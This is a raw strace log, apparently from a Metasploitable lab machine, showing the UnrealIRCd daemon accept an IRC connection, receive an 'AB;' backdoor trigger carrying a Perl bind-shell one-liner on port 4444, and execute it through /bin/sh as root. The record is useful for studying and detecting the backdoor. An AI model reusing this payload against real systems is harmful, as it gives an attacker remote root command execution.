4519  07:11:17.535606 select(1024, [2 3 4 7 9], [], NULL, {0, 540000}) = 1 (in [2], left {0, 390000})

4519  07:11:17.685195 clock_gettime(CLOCK_MONOTONIC, {1087, 502232346}) = 0

4519  07:11:17.685255 time(NULL)        = 1495624277

4519  07:11:17.685283 time(NULL)        = 1495624277

4519  07:11:17.685308 gettimeofday({1495624277, 685316}, NULL) = 0

4519  07:11:17.685329 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:11:17.685371 clock_gettime(CLOCK_MONOTONIC, {1087, 502384296}) = 0

4519  07:11:17.685429 gettimeofday({1495624277, 685436}, NULL) = 0

4519  07:11:17.685445 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:11:17.685486 clock_gettime(CLOCK_MONOTONIC, {1087, 502499523}) = 0

4519  07:11:17.685498 accept(2, 0, NULL) = 5

4519  07:11:17.685520 getpeername(5, {sa_family=AF_INET, sin_port=htons(45815), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:11:17.685561 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:11:17.685574 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:11:17.685587 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:11:17.685600 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:11:17.685612 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:11:17.685623 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:11:17.685639 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:11:17.685656 clock_gettime(CLOCK_MONOTONIC, {1087, 502669493}) = 0

4519  07:11:17.685668 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:11:17.685713 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:11:17.685724 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:11:17.685734 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:11:17.685745 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:11:17.685763 send(6, "GC\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:11:17.685818 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:11:17.685841 gettimeofday({1495624277, 685845}, NULL) = 0

4519  07:11:17.685867 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:11:17.690197 clock_gettime(CLOCK_MONOTONIC, {1087, 507217223}) = 0

4519  07:11:17.690219 recvfrom(6, "GC\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0W\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:11:17.690276 close(6)          = 0

4519  07:11:17.690306 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:11:17.690321 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:11:17.690504 time(NULL)        = 1495624277

4519  07:11:17.690522 time(NULL)        = 1495624277

4519  07:11:17.690536 gettimeofday({1495624277, 690540}, NULL) = 0

4519  07:11:17.690549 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:11:17.690652 clock_gettime(CLOCK_MONOTONIC, {1087, 507666628}) = 0

4519  07:11:17.690666 gettimeofday({1495624277, 690669}, NULL) = 0

4519  07:11:17.690677 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 10000})

4519  07:11:18.674517 clock_gettime(CLOCK_MONOTONIC, {1088, 491550842}) = 0

4519  07:11:18.674572 recv(4, "PRIVMSG  #testit Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 54

4519  07:11:18.674613 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674646 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674665 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674680 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674694 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674717 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674730 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674744 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674758 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674772 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674785 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674799 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674813 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674826 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674840 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674854 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674867 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674881 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674895 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674958 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.674988 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.675002 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:11:18.675019 gettimeofday({1495624278, 675023}, NULL) = 0

4519  07:11:18.675031 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:11:18.675073 clock_gettime(CLOCK_MONOTONIC, {1088, 492085821}) = 0

4519  07:11:18.675085 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:11:18.675114 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:11:18.675139 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:11:18.675151 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:11:18.675167 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 5907

5907  07:11:18.675238 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

5907  07:11:18.675252 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

5907  07:11:18.675263 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5907  07:11:18.675277 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

5907  07:11:18.675383 brk(0)            = 0x80f9000

5907  07:11:18.675412 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5907  07:11:18.675454 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f05000

5907  07:11:18.675488 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

5907  07:11:18.675505 open("/etc/ld.so.cache", O_RDONLY) = 1

5907  07:11:18.675518 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5907  07:11:18.675537 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7efd000

5907  07:11:18.675547 close(1)          = 0

5907  07:11:18.675558 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5907  07:11:18.675574 open("/lib/libncurses.so.5", O_RDONLY) = 1

5907  07:11:18.675587 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

5907  07:11:18.675687 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

5907  07:11:18.675705 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ecd000

5907  07:11:18.675717 mmap2(0xb7efa000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7efa000

5907  07:11:18.675734 close(1)          = 0

5907  07:11:18.675746 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5907  07:11:18.675760 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

5907  07:11:18.675775 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

5907  07:11:18.675865 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

5907  07:11:18.675882 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ec9000

5907  07:11:18.675894 mmap2(0xb7ecb000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ecb000

5907  07:11:18.675918 close(1)          = 0

5907  07:11:18.675930 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5907  07:11:18.675945 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

5907  07:11:18.675959 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

5907  07:11:18.676052 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

5907  07:11:18.676070 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ec8000

5907  07:11:18.676084 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d79000

5907  07:11:18.676095 mmap2(0xb7ec2000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ec2000

5907  07:11:18.676110 mmap2(0xb7ec5000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ec5000

5907  07:11:18.676125 close(1)          = 0

5907  07:11:18.676147 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d78000

5907  07:11:18.676159 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d786b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

5907  07:11:18.676215 mprotect(0xb7ec2000, 4096, PROT_READ) = 0

5907  07:11:18.676252 munmap(0xb7efd000, 29913) = 0

5907  07:11:18.676278 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5907  07:11:18.676292 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

5907  07:11:18.676312 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbff48900) = -1 ENOTTY (Inappropriate ioctl for device)

5907  07:11:18.676342 brk(0)            = 0x80f9000

5907  07:11:18.676352 brk(0x80fa000)    = 0x80fa000

5907  07:11:18.676364 brk(0x80fb000)    = 0x80fb000

5907  07:11:18.676380 getuid32()        = 0

5907  07:11:18.676390 getgid32()        = 0

5907  07:11:18.676399 geteuid32()       = 0

5907  07:11:18.676417 getegid32()       = 0

5907  07:11:18.676432 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5907  07:11:18.676445 time(NULL)        = 1495624278

5907  07:11:18.676458 brk(0x80fc000)    = 0x80fc000

5907  07:11:18.676473 brk(0x80fd000)    = 0x80fd000

5907  07:11:18.676493 open("/proc/meminfo", O_RDONLY) = 1

5907  07:11:18.676514 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

5907  07:11:18.676533 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f04000

5907  07:11:18.676544 read(1, "MemTotal:      1035240 kB\nMemFree:        628912 kB\nBuffers:         63592 kB\nCached:         187232 kB\nSwapCached:          0 kB\nActive:         252220 kB\nInactive:       127568 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        628672 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            5096 kB\nWriteback:           0 kB\nAnonPages:      128980 kB\nMapped:          52004 kB\nSlab:            15196 kB\nSReclaimable:     7204 kB\nSUnreclaim:       7992 kB\nPageTables:       1952 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

5907  07:11:18.676628 close(1)          = 0

5907  07:11:18.676640 munmap(0xb7f04000, 4096) = 0

5907  07:11:18.676651 brk(0x80fe000)    = 0x80fe000

5907  07:11:18.676678 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

5907  07:11:18.676691 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

5907  07:11:18.676703 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5907  07:11:18.676715 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5907  07:11:18.676727 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

5907  07:11:18.676739 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

5907  07:11:18.676753 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5907  07:11:18.676765 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5907  07:11:18.676778 uname({sys="Linux", node="metasploitable", ...}) = 0

5907  07:11:18.676826 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

5907  07:11:18.676848 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5907  07:11:18.676867 brk(0x8100000)    = 0x8100000

5907  07:11:18.676879 getcwd("/etc/unreal", 4096) = 12

5907  07:11:18.676893 getpid()          = 5907

5907  07:11:18.676920 getppid()         = 4519

5907  07:11:18.676937 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5907  07:11:18.676958 stat64("/sbin/sh", 0xbff488d8) = -1 ENOENT (No such file or directory)

5907  07:11:18.676970 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

5907  07:11:18.676988 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

5907  07:11:18.677012 socket(PF_FILE, SOCK_STREAM, 0) = 1

5907  07:11:18.677026 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

5907  07:11:18.677038 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

5907  07:11:18.677060 close(1)          = 0

5907  07:11:18.677072 socket(PF_FILE, SOCK_STREAM, 0) = 1

5907  07:11:18.677083 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

5907  07:11:18.677093 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

5907  07:11:18.677111 close(1)          = 0

5907  07:11:18.677124 open("/etc/nsswitch.conf", O_RDONLY) = 1

5907  07:11:18.677139 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

5907  07:11:18.677155 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f04000

5907  07:11:18.677167 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

5907  07:11:18.677217 read(1, "", 4096) = 0

5907  07:11:18.677226 close(1)          = 0

5907  07:11:18.677236 munmap(0xb7f04000, 4096) = 0

5907  07:11:18.677252 open("/etc/ld.so.cache", O_RDONLY) = 1

5907  07:11:18.677265 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5907  07:11:18.677281 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7efd000

5907  07:11:18.677291 close(1)          = 0

5907  07:11:18.677302 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5907  07:11:18.677317 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

5907  07:11:18.677332 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

5907  07:11:18.677396 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

5907  07:11:18.677416 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d6f000

5907  07:11:18.677428 mmap2(0xb7d76000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7d76000

5907  07:11:18.677445 close(1)          = 0

5907  07:11:18.677461 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5907  07:11:18.677475 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

5907  07:11:18.677489 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

5907  07:11:18.677578 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

